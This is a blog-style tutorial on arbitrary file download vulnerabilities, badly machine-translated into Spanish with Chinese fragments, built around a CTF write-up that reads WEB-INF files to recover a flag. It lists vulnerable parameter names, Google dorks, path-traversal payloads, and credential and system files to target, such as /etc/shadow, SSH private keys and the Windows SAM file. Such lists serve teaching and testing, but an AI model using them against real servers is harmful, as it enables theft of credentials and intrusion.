Prefacio:
Anteriormente tenido contacto con este conocimiento, no es sólo esta pregunta de examen este conocimiento, se aprende en detalle acerca de la descarga de la vulnerabilidad archivo arbitrario
Descargar cualquier perfil lagunas
Debido a las necesidades empresariales, muchos sitios a menudo tienen que proporcionar documentación (fijación) bloquea la función de descarga, pero si el archivo se descarga restricciones no se descarga directamente sus archivos a través de la ruta absoluta, entonces el usuario malintencionado puede utilizar este servidor para descargar archivos confidenciales en el servidor para obtener más amenazas y ataques.
Descargar cualquier vulnerabilidad de daños
Al descargar los archivos, puede descargar cualquier servidor de archivos, servicio web información de configuración específica del código, y sistemas de servidores, también puede descargar información de configuración en la base de datos, así como información de la red interna de detectar, y así sucesivamente.
Por brevemente más arriba, podemos ver cualquier vulnerabilidad de descarga es muy común, si los usuarios ver o descargar el archivo no tiene límite, pero podría ser explotado, causando daños, y luego a aprender a cualquiera de las vulnerabilidades descarga utilización.
Utilizar cualquier descarga vulnerabilidad
existencia
Enlaces desde el punto de vista, similar a éstos, es posible descargar existen lagunas
download.php?path=
download.php?file=
down.php?file=
data.php?file=
readfile.php?file=
read.php?filename=
portada analítica
Aquí para hacer una pregunta como ejemplo
ver el código fuente y encontró este formato, la especulación puede descargar cualquier archivo o archivos que contienen
abierta y encontrado una página escrita en Java
entonces podemos considerar si se puede hacer con cualquier vulnerabilidad descarga este enfoque, tratar, pero lo extraño es si construimos los parámetros no se encuentran, el chef me dijo que esta cuestión tiene que cambiar el método de solicitud de trabajo o la experiencia del maestro de profundidad
De entrada, que realmente puede encontrar
filename=WEB-INF/web.xml
Hay dos archivos clave que se encuentran la ubicación de la bandera, primero echar un vistazo acom.wm.ctf.FlagController
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
Encontrado una cadena de base64, la decodificación se puede derivar bandera
Esta pregunta implica una gran cantidad de conocimientos, echar un vistazo más de cerca, dijo:
En primer lugar, vemos que esto está escrito en Java y páginas web directorio WEB-INF de Java es la seguridad de las aplicaciones web.
La carpeta WEB-INF, además de web.xml
, pero también mantener una classes
carpeta para colocar los *.class
archivos, estos *.class
archivos se escriben en la web personal de la biblioteca de diseño para lograr la jsp
separación del primer plano de la página y servicios de última generación fondo, hace que el mantenimiento de la página web es muy fácil de usar. web.xml
Archivo archivo XML descriptor de despliegue para el sitio, el despliegue del sitio es muy importante.
Es por esto que empezamos a ver la directa WEB-INF/web.xml
causa de la
Resumir aquí directorio WEB-INF o comunes de archivos
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
Sabiendo esto, el problema anterior realmente no es difícil, sólo examinar si un conocimiento exhaustivo
resumen de la vulnerabilidad
Descargar cualquier vulnerabilidades se pueden buscar por Google
inurl : readfile.php?file=
inurl : download.php?file=
Desde el punto de vista nombre del parámetro, más o menos:
&readpath=
&filepath=
&Path=
&inputfile=
&url=
&Lang=
&dis=
&data=
&readfile=
&menu=
META-INF=
WEB-INF
Estos parámetros pueden ser vacíos (por supuesto, para ver cómo la protección lateral de gestión)
Para resumir linux descarga y el uso de archivos de Windows
ventanas:
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
Linux
root/.ssh/authorized_keys////如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa//ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore//记录每个访问计算机用户的公钥
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow//账户密码文件
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
verificación de la vulnerabilidad
xxx.php?f=../../../../../../etc/passwd
xxx.php?f=../index.php
xxx.php?f=file:///etc/passwd
El parámetro f valores de los parámetros de archivos PHP:
1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件查看漏洞
3.提示下载,则是文件下载漏洞
Varios ruta del archivo
y, finalmente, proporciona un resumen de los recursos del gángster
resumen
Demasiada comida, tener una escuela buena, la próxima escritura no es muy detallado, gire a la izquierda para ver el blog qwzf Gangster